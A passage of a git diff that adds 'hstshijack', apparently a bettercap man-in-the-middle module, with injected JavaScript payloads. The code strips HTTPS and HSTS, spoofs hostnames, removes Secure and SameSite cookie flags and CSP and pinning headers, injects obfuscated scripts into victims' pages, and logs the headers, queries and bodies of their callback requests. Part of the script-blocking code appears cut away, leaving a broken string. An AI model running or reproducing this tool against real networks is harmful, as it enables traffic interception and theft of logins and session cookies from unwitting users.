target_hosts = env["hstshijack.targets"].replace(/\s/g, "").split(",") + : target_hosts = []; + env["hstshijack.replacements"] + ? replacement_hosts = env["hstshijack.replacements"].replace(/\s/g, "").split(",") + : replacement_hosts = []; + env["hstshijack.blockscripts"] + ? block_script_hosts = env["hstshijack.blockscripts"].replace(/\s/g, "").split(",") + : block_script_hosts = []; + env["hstshijack.obfuscate"] + ? obfuscate = env["hstshijack.obfuscate"].replace(/\s/g, "").toLowerCase() + : obfuscate = false; + + /* Validate caplet. */ + if (target_hosts.length < replacement_hosts.length) { + log_fatal(on_blue + "hstshijack" + reset + " Too many hstshijack.replacements (got " + replacement_hosts.length + ")."); + } + if (target_hosts.length > replacement_hosts.length) { + log_fatal(on_blue + "hstshijack" + reset + " Not enough hstshijack.replacements (got " + replacement_hosts.length + ")."); + } + if (target_hosts.indexOf("*") !== -1) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets value (got *)."); + } + if (replacement_hosts.indexOf("*") !== -1) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.replacements value (got *)."); + } + + whole_prefix_wildcard_domain_selector = /^(?:\*\.[a-z]{1,63}|(?:(?:\*\.|)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))$/i; + whole_suffix_wildcard_domain_selector = /^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+\*$/i; + for (a = 0; a < ignore_hosts.length; a++) { + if ( + !ignore_hosts[a].match(/^\*$/i) + && !ignore_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !ignore_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.ignore value (got " + ignore_hosts[a] + ")."); + } + } + + for (a = 0; a < target_hosts.length; a++) { + if ( + !target_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !target_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + 
"hstshijack" + reset + " Invalid hstshijack.targets value (got " + target_hosts[a] + ")."); + } + + if ( + !replacement_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !replacement_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.replacements value (got " + replacement_hosts[a] + ")."); + } + + if (target_hosts[a].match(/\*/g) || replacement_hosts[a].match(/\*/g)) { + target_host_wildcard_count = target_hosts[a].match(/\*/g).length || 0; + replacement_host_wildcard_count = replacement_hosts[a].match(/\*/g).length || 0; + if (target_host_wildcard_count !== replacement_host_wildcard_count) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets or hstshijack.replacements value, wildcards do not match (got " + target_hosts[a] + " and " + replacement_hosts[a] + ")."); + } + } + } + + for (a = 0; a < block_script_hosts.length; a++) { + if ( + !block_script_hosts[a].match(/^\*$/i) + && !block_script_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !block_script_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.blockscripts value (got " + block_script_hosts[a] + ")."); + } + } + + if (obfuscate === "true") { + obfuscate = true; + } else { + obfuscate = false; + } + + /* Prepare payloads. */ + env["hstshijack.payloads"] + ? 
payload_entries = env["hstshijack.payloads"].replace(/\s/g, "").split(",") + : payload_entries = []; + + for (a = 0; a < payload_entries.length; a++) { + if ( + !payload_entries[a].match(/^\*:.+$/i) + && !payload_entries[a].match(/^(?:\*\.[a-z]{1,63}|(?:(?:\*\.|)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))):.+$/i) + && !payload_entries[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.payloads value (got " + payload_entries[a] + ")."); + } + + payload_host = payload_entries[a].replace(/[:].*/, ""); + payload_path = payload_entries[a].replace(/.*[:]/, ""); + + payload = ""; + if (!(payload = readFile(payload_path))) { + log_fatal(on_blue + "hstshijack" + reset + " Could not read a payload (got " + payload_path + ")."); + } else { + payload = payload + .replace(/obf_var_target_hosts/g, varname_target_hosts) + .replace(/obf_var_replacement_hosts/g, varname_replacement_hosts) + .replace(/obf_path_callback/g, callback_path) + .replace(/obf_path_ssl_index/g, ssl_index_path) + .replace(/obf_path_whitelist/g, whitelist_path); + + if (obfuscate) { + obfuscation_variables = payload.match(/obf_[a-z0-9_]*/ig) || []; + for (b = 0; b < obfuscation_variables.length; b++) { + if (obfuscation_variables.indexOf(obfuscation_variables[b]) === b) { + regexp = new RegExp(obfuscation_variables[b], "g"); + payload = payload.replace(regexp, randomString(8 + (Math.random() * 8))); + } + } + } + + if (payloads[payload_host]) { + payloads[payload_host] = payloads[payload_host] + "\n" + payload + "\n"; + } else { + payloads[payload_host] = payload + "\n"; + } + } + } + + /* Prepare payload container */ + payload_container_prefix = payload_container_prefix.replace(/\{\{SESSION_ID_TAG\}\}/g, session_id); + payload_container_prefix = payload_container_prefix + + "var " + varname_target_hosts + " = [\"" + target_hosts.join("\",\"") + "\"];\n" + + "var " + varname_replacement_hosts + " = [\"" + 
replacement_hosts.join("\",\"") + "\"];\n"; + payload_container_suffix = payload_container_suffix.replace(/\{\{SESSION_ID_TAG\}\}/g, session_id); + + /* Prepare SSL index */ + ssl_index_check = env["hstshijack.ssl.check"].toLowerCase() || "true"; + all_domains = readFile(env["hstshijack.ssl.domains"]).split("\n"); + if (all_domains.length === 0) { + log_info(on_blue + "hstshijack" + reset + " No indexed domains were found, index will be reset."); + } else { + if (ssl_index_check !== "false") { + log_info(on_blue + "hstshijack" + reset + " Indexing SSL domains ..."); + all_domains + .sort() + .filter(function(domain, index, arr){ + if (domain !== "" && arr.indexOf(domain) === index) { + indexDomain(domain); + } + }); + } else { + ssl.domains = all_domains; + index_file_contents = readFile(env["hstshijack.ssl.index"]); + if (ssl.domains.length !== 0 && index_file_contents === "") { + log_fatal(on_blue + "hstshijack" + reset + " List of domains using SSL is not indexed. Please set your hstshijack.ssl.check value to true in your caplet."); + } + ssl.index = JSON.parse(index_file_contents); + log_info(on_blue + "hstshijack" + reset + " Skipped SSL index check for " + all_domains.length + " domain(s)."); + } + } + + /* Ensure targeted hosts are in SSL log (no wildcards). */ + for (var a = 0; a < target_hosts.length; a++) { + if (target_hosts[a].indexOf("*") === -1) { + indexDomain(target_hosts[a]); + } + } + + saveSSLIndex(); + log_info(on_blue + "hstshijack" + reset + " Indexed " + ssl.domains.length + " domains."); +} + +function showConfig() { + /* Print module configuration. */ + logStr = "\n"; + logStr += " " + bold + "Caplet" + reset + "\n"; + logStr += "\n"; + logStr += " " + yellow + " hstshijack.ssl.domains" + reset + " > " + (env["hstshijack.ssl.domains"] ? green + env["hstshijack.ssl.domains"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ssl.index" + reset + " > " + (env["hstshijack.ssl.index"] ? 
green + env["hstshijack.ssl.index"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ssl.check" + reset + " > " + (env["hstshijack.ssl.check"].match(/^true$/i) ? green + "true" : red + "false") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ignore" + reset + " > " + (env["hstshijack.ignore"] ? green + env["hstshijack.ignore"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.targets" + reset + " > " + (env["hstshijack.targets"] ? green + env["hstshijack.targets"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + "hstshijack.replacements" + reset + " > " + (env["hstshijack.replacements"] ? green + env["hstshijack.replacements"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + "hstshijack.blockscripts" + reset + " > " + (env["hstshijack.blockscripts"] ? green + env["hstshijack.blockscripts"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.obfuscate" + reset + " > " + (obfuscate ? 
green + "true" : red + "false") + reset + "\n"; + logStr += " " + yellow + " hstshijack.payloads" + reset + " > "; + if (env["hstshijack.payloads"]) { + list = env["hstshijack.payloads"].replace(/\s/g, "").split(","); + logStr += green + list[0] + reset + "\n"; + if (list.length > 1) { + for (a = 1; a < list.length; a++) { + logStr += " > " + green + list[a] + reset + "\n"; + } + } + } else { + logStr += red + "undefined" + reset + "\n"; + } + logStr += "\n"; + logStr += " " + bold + "Commands" + reset + "\n"; + logStr += "\n"; + logStr += " " + bold + " hstshijack.show" + reset + " : Show module info.\n"; + logStr += " " + bold + "hstshijack.ssl.domains" + reset + " : Show recorded domains with SSL.\n"; + logStr += " " + bold + " hstshijack.ssl.index" + reset + " : Show SSL domain index.\n"; + logStr += "\n"; + logStr += " " + bold + "Session info" + reset + "\n"; + logStr += "\n"; + logStr += " " + bold + " Session ID" + reset + " : " + session_id + "\n"; + logStr += " " + bold + " Callback path" + reset + " : " + callback_path + "\n"; + logStr += " " + bold + "Whitelist path" + reset + " : " + whitelist_path + "\n"; + logStr += " " + bold + "SSL index path" + reset + " : " + ssl_index_path + "\n"; + logStr += " " + bold + " SSL domains" + reset + " : " + ssl.domains.length + " domain" + (ssl.domains.length === 1 ? 
"" : "s") + "\n"; + console.log(logStr); +} + +function onCommand(cmd) { + if (cmd === "hstshijack.show") { + showConfig(); + return true; + } + if (cmd === "hstshijack.ssl.domains") { + if (ssl.domains.length > 20) { + truncated_domains = ssl.domains.slice(0, 20); + truncated_domains.push("..."); + log_string = truncated_domains.join(reset + "\n " + yellow); + console.log("\n" + bold + " Recorded domains with SSL (" + ssl.domains.length + ")" + reset + "\n\n " + yellow + log_string + reset + "\n"); + } else { + console.log("\n" + bold + " Recorded domains with SSL (" + ssl.domains.length + ")" + reset + "\n\n " + yellow + ssl.domains.join(reset + "\n " + yellow) + reset + "\n"); + } + return true; + } + if (cmd === "hstshijack.ssl.index") { + log_string = "\n" + bold + " SSL domain index (" + Object.keys(ssl.index).length + ")" + reset + "\n"; + for (a = 0; a < Object.keys(ssl.index).length; a++) { + indexed_char = Object.keys(ssl.index)[a]; + char_index = ssl.index[indexed_char]; + log_string += "\n " + yellow + indexed_char + reset + " (first: " + char_index[0] + ", last: " + char_index[1] + ")"; + } + console.log(log_string + "\n"); + return true; + } + if (cmd === "hstshijack.whitelist") { + console.log("\n" + JSON.stringify(whitelist, null, 2) + "\n"); + return true; + } +} + +function onLoad() { + math_seed = new Date().getMilliseconds(); + Math.random = function() { + return randomFloat(); + } + + log_info(on_blue + "hstshijack" + reset + " Generating random variable names for this session ..."); + session_id = randomString(8 + Math.random() * 8); + varname_target_hosts = randomString(8 + Math.random() * 8); + varname_replacement_hosts = randomString(8 + Math.random() * 8); + callback_path = "/" + randomString(8 + Math.random() * 8); + whitelist_path = "/" + randomString(8 + Math.random() * 8); + ssl_index_path = "/" + randomString(8 + Math.random() * 8); + + log_info(on_blue + "hstshijack" + reset + " Reading caplet ..."); + configure(); + log_info(on_blue 
+ "hstshijack" + reset + " Module loaded."); + showConfig(); +} + +function onRequest(req, res) { + if (req.Path === ssl_index_path) { + /* + SSL callback. + + Requests made for this path should include a hostname in the query so + this module can send a HEAD request to learn HTTPS redirects. + */ + log_debug(on_blue + "hstshijack" + reset + " SSL callback received from " + green + req.Client.IP + reset + " for " + bold + req.Query + reset + "."); + queried_host = req.Query; + if (getDomainIndex(queried_host, getIndexRange(queried_host.charAt(0))) === -1) { + log_debug(on_blue + "hstshijack" + reset + " Learning unencrypted HTTP response from " + queried_host + " ..."); + req.Hostname = queried_host; + req.Path = "/"; + req.Query = ""; + req.Body = ""; + req.Method = "HEAD"; + } + } else if (req.Path === callback_path) { + /* + Basic callback. + + Requests made for this path will be dropped. + Requests made for this path will be printed. + */ + req.Scheme = "ignore"; + logStr = on_blue + "hstshijack" + reset + " Callback received from " + green + req.Client.IP + reset + " for " + bold + req.Hostname + reset + "\n"; + logStr += " " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " [" + green + "hstshijack.callback" + reset + "] " + on_grey + "CALLBACK" + reset + " " + "http://" + req.Hostname + req.Path + (req.Query !== "" ? ("?" 
+ req.Query) : "") + "\n " + on_grey + " " + reset + " \n"; + logStr += " " + on_grey + " " + reset + " " + bold + "Headers" + reset + "\n " + on_grey + " " + reset + " \n"; + headers = req.Headers.split("\r\n"); + for (i = 0; i < headers.length; i++) { + if (headers[i].split(": ").length === 2) { + params = headers[i].split(": "); + logStr += " " + on_grey + " " + reset + " " + blue + params[0] + reset + ": " + yellow + params[1] + reset + "\n"; + } else { + logStr += " " + on_grey + " " + reset + " " + yellow + headers[i] + reset + "\n"; + } + } + logStr += " " + on_grey + " " + reset + " " + bold + "Query" + reset + "\n " + on_grey + " " + reset + " \n"; + queries = req.Query.split("&"); + for (i = 0; i < queries.length; i++) { + if (queries[i].split("=").length === 2) { + params = queries[i].split("="); + logStr += " " + on_grey + " " + reset + " " + green + decodeURIComponent(params[0]) + reset + " : " + decodeURIComponent(params[1]) + reset + "\n"; + } else { + logStr += " " + on_grey + " " + reset + " " + green + queries[i] + reset + "\n"; + } + } + logStr += " " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " " + bold + "Body" + reset + "\n " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " " + yellow + req.ReadBody() + reset + "\n"; + log_info(logStr); + } else if (req.Path === whitelist_path) { + /* + Whitelisting callback. + + Requests made for this path will be dropped. + Requests made for this path will be printed. + Requests made for this path will stop all attacks towards this client with the requested hostname. + */ + req.Scheme = "ignore"; + logStr = on_blue + "hstshijack" + reset + " Whitelisting callback received from " + green + req.Client.IP + reset + " for " + bold + req.Hostname + reset + "\n"; + logStr += " " + on_white + " " + reset + " \n " + on_white + " " + reset + " [" + green + "hstshijack.callback" + reset + "] " + on_white + "WHITELIST" + reset + " " + "http://" + req.Hostname + req.Path + (req.Query !== "" ? 
("?" + req.Query) : "") + "\n " + on_white + " " + reset + " \n"; + logStr += " " + on_white + " " + reset + " " + bold + "Headers" + reset + "\n " + on_white + " " + reset + " \n"; + headers = req.Headers.split("\n"); + for (i = 0; i < headers.length; i++) { + if (headers[i].split(": ").length === 2) { + params = headers[i].split(": "); + logStr += " " + on_white + " " + reset + " " + blue + params[0] + reset + ": " + yellow + params[1] + reset + "\n"; + } else { + logStr += " " + on_white + " " + reset + " " + yellow + headers[i] + reset + "\n"; + } + } + logStr += " " + on_white + " " + reset + " " + bold + "Query" + reset + "\n " + on_white + " " + reset + " \n"; + queries = req.Query.split("&"); + for (i = 0; i < queries.length; i++) { + if (queries[i].split("=").length === 2) { + params = queries[i].split("="); + logStr += " " + on_white + " " + reset + " " + green + decodeURIComponent(params[0]) + reset + " : " + decodeURIComponent(params[1]) + reset + "\n"; + } else { + logStr += " " + on_white + " " + reset + " " + green + queries[i] + reset + "\n"; + } + } + logStr += " " + on_white + " " + reset + " \n " + on_white + " " + reset + " " + bold + "Body" + reset + "\n " + on_white + " " + reset + " \n " + on_white + " " + reset + " " + yellow + req.ReadBody() + reset + "\n"; + log_info(logStr); + + /* Add requested hostname to whitelist. */ + if (whitelist[req.Client.IP]) { + if (whitelist[req.Client.IP].indexOf(req.Hostname) === -1) { + whitelist[req.Client.IP].push(req.Hostname); + } + } else { + whitelist[req.Client.IP] = [req.Hostname]; + } + /* Also whitelist unspoofed version of requested hostname. */ + for (a = 0; a < target_hosts.length; a++) { + whole_regexp_set = toWholeRegexpSet(replacement_hosts[a], target_hosts[a]); + if (req.Hostname.match(whole_regexp_set[0])) { + whitelist[req.Client.IP].push(req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1])); + break; + } + } + } else { + /* + Not a callback. 
+ + Redirect client to the real host if a whitelist callback was received previously. + Restore spoofed hostnames and schemes in request. + */ + if (whitelist[req.Client.IP]) { + for (a = 0; a < whitelist[req.Client.IP].length; a++) { + whole_regexp_set = toWholeRegexpSet(whitelist[req.Client.IP][a], ""); + if (req.Hostname.match(whole_regexp_set[0])) { + /* Restore requested hostname if it was spoofed. */ + var unspoofed_host; + for (b = 0; b < replacement_hosts.length; b++) { + whole_regexp_set = toWholeRegexpSet(replacement_hosts[b], target_hosts[b]); + if (req.Hostname.match(whole_regexp_set[0])) { + unspoofed_host = req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1]); + query = (req.Query !== "" ? ("?" + req.Query) : ""); + res.SetHeader("Location", "https://" + unspoofed_host + req.Path + query); + res.Status = 301; + log_info(on_blue + "hstshijack" + reset + " Redirecting " + green + req.Client.IP + reset + " from " + bold + req.Hostname + reset + " to " + bold + unspoofed_host + reset + " because we received a whitelisting callback."); + return; + } + } + } + } + } + + /* Restore original hostnames. */ + for (a = 0; a < target_hosts.length; a++) { + /* Restore original hostnames in headers. */ + regexp_set = toRegexpSet(replacement_hosts[a], target_hosts[a]); + if (req.Headers.match(regexp_set[0])) { + req.Headers = req.Headers.replace(regexp_set[0], regexp_set[1]); + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + replacement_hosts[a] + reset + " in request header(s)."); + } + + if (req.Query !== "") { + /* Restore original hostnames in query URI. */ + if (req.Query.match(regexp_set[0])) { + req.Query = req.Query.replace(regexp_set[0], regexp_set[1]); + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + replacement_hosts[a] + reset + " in query URI."); + } + + /* Restore original hostnames in encoded query URI parameters. 
*/ + query_params = req.Query.split("&"); + new_params = []; + for (b = 0; b < query_params.length; b++) { + param = query_params[b]; + param_parts = param.match(selector_query_param); + if (param_parts) { + param_name = param_parts[1]; + param_value = param_parts[2]; + if (param_value.indexOf("%") !== -1) { + param_value_decoded = decodeURIComponent(param_value); + if (param_value !== param_value_decoded) { + if (param_value_decoded.match(regexp_set[0])) { + param_value_decoded_spoofed = param_value_decoded.replace( + regexp_set[0], + regexp_set[1]); + new_params.push( + param_name + "=" + encodeURIComponent(param_value_decoded_spoofed)); + } else { + new_params.push(param); + } + } else { + new_params.push(param); + } + } else { + if (param_value.match(regexp_set[0])) { + param_value_spoofed = param_value.replace(regexp_set[0], regexp_set[1]); + new_params.push(param_name + "=" + param_value_spoofed); + } else { + new_params.push(param); + } + } + } else { + new_params.push(param); + } + } + new_query_string = new_params.join("&"); + if (new_query_string !== req.Query) { + req.Query = new_query_string; + } + } + + /* Restore original hostname of request. */ + whole_regexp_set = toWholeRegexpSet(replacement_hosts[a], target_hosts[a]) + if (req.Hostname.match(whole_regexp_set[0])) { + spoofed_host = req.Hostname; + req.Hostname = req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1]); + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + spoofed_host + reset + " to " + req.Hostname + " and restored HTTPS scheme."); + } + } + + /* Restore HTTPS scheme. */ + if (getDomainIndex(req.Hostname, getIndexRange(req.Hostname.charAt(0))) !== -1) { + /* Restore HTTPS scheme of request if domain is indexed. 
*/ + if (req.Scheme !== "https") { + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + bold + req.Hostname + reset + "."); + } + /* Restore HTTPS scheme in request headers if domains are indexed. */ + escaped_domain = req.Hostname.replace(selector_all_dots, "\\.").replace(selector_all_dashes, "\\-"); + regexp = new RegExp("http://" + escaped_domain + "([^a-z0-9\\-\\.]|$)", "ig"); + if (req.Headers.match(regexp)) { + req.Headers = req.Headers.replace(regexp, "https://" + req.Hostname + "$1"); + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + req.Hostname + " in request headers."); + } + } else { /* If requested domain is not indexed. */ + log_debug(on_blue + "hstshijack" + reset + " Domain " + bold + req.Hostname + reset + " is not indexed."); + if (req.Scheme !== "https") { + for (b = 0; b < target_hosts; b++) { + /* Restore HTTPS scheme of request if domain is targeted. */ + whole_regexp_set = toWholeRegexpSet(target_hosts[b], ""); + if (req.Hostname.match(whole_regexp_set[0])) { + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of targeted domain " + bold + req.Hostname + reset + "."); + break; + } + /* Restore HTTPS scheme in request headers if domains are targeted. */ + regexp_set = toRegexpSet(target_hosts[b], ""); + matches = req.Headers.match(regexp_set[0]); + for (c = 0; c < matches.length; c++) { + escaped_domain = matches[c].replace(selector_all_dots, "\\.").replace(selector_all_dashes, "\\-"); + regexp = new RegExp("http://" + escaped_domain + "([^a-z0-9\\-\\.]|$)", "ig"); + req.Headers = req.Headers.replace(regexp, "https://" + matches[c] + "$1"); + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + req.Hostname + " in request headers."); + } + } + } + } + } +} + +function onResponse(req, res) { + res.ReadBody(); + + /* Remember HTTPS redirects. 
*/ + location = res.GetHeader("Location", ""); + if (location.match(selector_uri_one)) { + host = location.replace(selector_uri_two, "$1"); + if (host !== "") { + indexDomain(host); + } + } + + /* Ignore this response if whitelisted. */ + if (whitelist[req.Client.IP]) { + if (whitelist[req.Client.IP].indexOf(req.Hostname) !== -1) { + log_debug(on_blue + "hstshijack" + reset + " Ignoring response from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset + "."); + return; + } + } else { + for (a = 0; a < ignore_hosts.length; a++) { + var whole_regexp_set; + if (ignore_hosts[a] !== "*") { + whole_regexp_set = toWholeRegexpSet(ignore_hosts[a], ""); + } + + if ( + ignore_hosts[a] === "*" + || req.Hostname.match(whole_regexp_set[0]) + ) { + log_debug(on_blue + "hstshijack" + reset + " Ignored response from " + bold + req.Hostname + reset + "."); + return; + } + } + + /* Spoof markup bodies. */ + if ( + res.ContentType.match(selector_content_type_html) + || req.Path.match(selector_extension_html) + ) { + /* Prevent meta tag induced CSP restrictions. */ + res.Body = res.Body.replace( + selector_meta_tag_csp, + "$1"); + + /* Block scripts. */ + for (a = 0; a < block_script_hosts.length; a++) { + if ( + block_script_hosts[a] === "*" + || req.Hostname.match(toWholeRegexpSet(block_script_hosts[a], "")[0]) + ) { + res.Body = res.Body.replace(selector_html_script_open_tag, "
\n" + + payload_container_prefix + injection + payload_container_suffix + + "\n" + + res.Body; + } + log_debug(on_blue + "hstshijack" + reset + " Injected document from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset); + } + } + + /* Spoof JavaScript bodies. */ + if (res.ContentType.match(selector_content_type_js)) { + /* Block scripts. */ + for (a = 0; a < block_script_hosts.length; a++) { + if ( + block_script_hosts[a] === "*" + || req.Hostname.match(toWholeRegexpSet(block_script_hosts[a], "")[0]) + ) { + res.Body = ""; + log_debug(on_blue + "hstshijack" + reset + " Cleared JavaScript resource from " + bold + req.Hostname + reset + "."); + break; + } + } + + /* Inject payloads. */ + injection = ""; + for (a = 0; a < Object.keys(payloads).length; a++) { + injecting_host = Object.keys(payloads)[a]; + if ( + injecting_host === "*" + || req.Hostname.match(toWholeRegexpSet(injecting_host, "")[0]) + ) { + injection = injection + payloads[injecting_host]; + } + } + if (injection !== "") { + res.Body = payload_container_prefix + injection + payload_container_suffix + res.Body; + log_debug(on_blue + "hstshijack" + reset + " Injected JavaScript file from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset); + } + } + + /* Strip SSL from location headers. */ + res.Headers = res.Headers + .replace(selector_scheme_http_https_colon, "$1:") + .replace(selector_port_https, "$1"); + + /* Spoof hosts in headers. */ + for (a = 0; a < target_hosts.length; a++) { + regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]); + res.Headers = res.Headers.replace(regexp_set[0], regexp_set[1]); + } + + /* Remove secure cookie settings. 
*/ + new_headers = ""; + res.Headers.split("\r\n").forEach(function(headerString){ + if (headerString !== "") { + matches = headerString.match(selector_header); + if (matches.length >= 3) { + header_name = matches[1]; + header_value = matches[2]; + if (header_name.match(selector_header_set_cookie)) { + new_header_value = ""; + cookie_params = header_value.split(";"); + cookie_params.forEach(function(cookie_param){ + if (cookie_param !== "") { + stripped_cookie_param = cookie_param.match(selector_strip_whitespace)[1]; + if (!stripped_cookie_param.match(selector_header_set_cookie_secure_samesite)) { + if (new_header_value === "") { + new_header_value = stripped_cookie_param; + } else { + new_header_value += "; " + stripped_cookie_param; + } + } + } + }); + new_headers += header_name + ": " + new_header_value + "\r\n"; + } else { + new_headers += header_name + ": " + header_value + "\r\n"; + } + } + } + }); + + /* Remove security headers. */ + res.Headers = res.Headers.replace(selector_header_csp, ""); + res.RemoveHeader("Strict-Transport-Security"); + res.RemoveHeader("Content-Security-Policy-Report-Only"); + res.RemoveHeader("Public-Key-Pins"); + res.RemoveHeader("Public-Key-Pins-Report-Only"); + res.RemoveHeader("X-Frame-Options"); + res.RemoveHeader("X-Content-Type-Options"); + res.RemoveHeader("X-Download-Options"); + res.RemoveHeader("X-Permitted-Cross-Domain-Policies"); + res.RemoveHeader("X-XSS-Protection"); + res.RemoveHeader("Expect-Ct"); + + /* Set insecure headers. 
*/ + allowed_origin = res.GetHeader("Access-Control-Allow-Origin", "*"); + if (allowed_origin !== "*") { + for (a = 0; a < target_hosts.length; a++) { + regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]); + if (allowed_origin.match(regexp_set[0])) { + allowed_origin = allowed_origin.replace(regexp_set[0], regexp_set[1]); + break; + } + } + } + res.SetHeader("Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("X-WebKit-CSP", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("X-Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("Access-Control-Allow-Credentials", 
"true"); + res.SetHeader("Access-Control-Allow-Origin", allowed_origin); + res.SetHeader("Access-Control-Allow-Methods", "*"); + res.SetHeader("Access-Control-Allow-Headers", "*"); + res.SetHeader("Cache-Control", "no-cache, no-store, must-revalidate"); + res.SetHeader("Expires", "Fri, 20 Apr 2018 04:20:00 GMT"); + res.SetHeader("Pragma", "no-cache"); + } +} + diff --git a/hstshijack/index.json b/hstshijack/index.json new file mode 100644 index 0000000..e69de29 diff --git a/hstshijack/payloads/google-search.js b/hstshijack/payloads/google-search.js new file mode 100644 index 0000000..d50be33 --- /dev/null +++ b/hstshijack/payloads/google-search.js @@ -0,0 +1,23 @@ +globalThis.addEventListener("DOMContentLoaded", function(){ + "use strict"; + + if (location.pathname === "/search") { + document.querySelectorAll("a").forEach(function(obf_var_link){ + if (obf_var_link.href && obf_var_link.href !== "") { + var obf_var_container = document.createElement("obf_dummy"); + obf_var_container.append(obf_var_link.cloneNode(true)) + obf_var_container.addEventListener("click", function(e){ + e.preventDefault(); + location.href = obf_var_link.href; + }); + obf_var_link.before(obf_var_container); + obf_var_link.remove(); + } + }); + } + + var obf_var_stylesheet = document.createElement("style"); + obf_var_stylesheet.innerText = `.gb_Pa{box-shadow:none}`; + document.body.append(obf_var_stylesheet); +}); + diff --git a/hstshijack/payloads/hijack.js b/hstshijack/payloads/hijack.js new file mode 100644 index 0000000..265eed8 --- /dev/null +++ b/hstshijack/payloads/hijack.js 
@@ -0,0 +1,234 @@ +/* + Hooks XMLHttpRequest as well as 'a', 'form', 'script' and 'iframe' nodes. + This payload is essential for hostname replacements. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + +(function(){ + "use strict"; + + var obf_var_regex_one = /\-/g, + obf_var_regex_two = /^\*./, + obf_var_regex_three = /^\*\./, + obf_var_regex_four = /\./g, + obf_var_regex_five = /^\*\./, + obf_var_regex_six = /\.\*$/, + obf_var_regex_seven = /\.\*/g; + + globalThis.addEventListener("DOMContentLoaded", function(){ + "use strict"; + + var obf_func_open = XMLHttpRequest.prototype.open, + obf_var_XMLHttpRequest = new XMLHttpRequest(), + obf_var_callback_log = []; + + function obf_func_toWholeRegexpSet(obf_var_selector_string, obf_var_replacement_string) { + if (obf_var_selector_string.indexOf("*") != -1) { + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_one, "\\-"); + if (obf_var_selector_string.match(obf_var_regex_two)) { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_three, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"), + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_five, ""); + return [ + new RegExp("^" + obf_var_selector_string + "$", 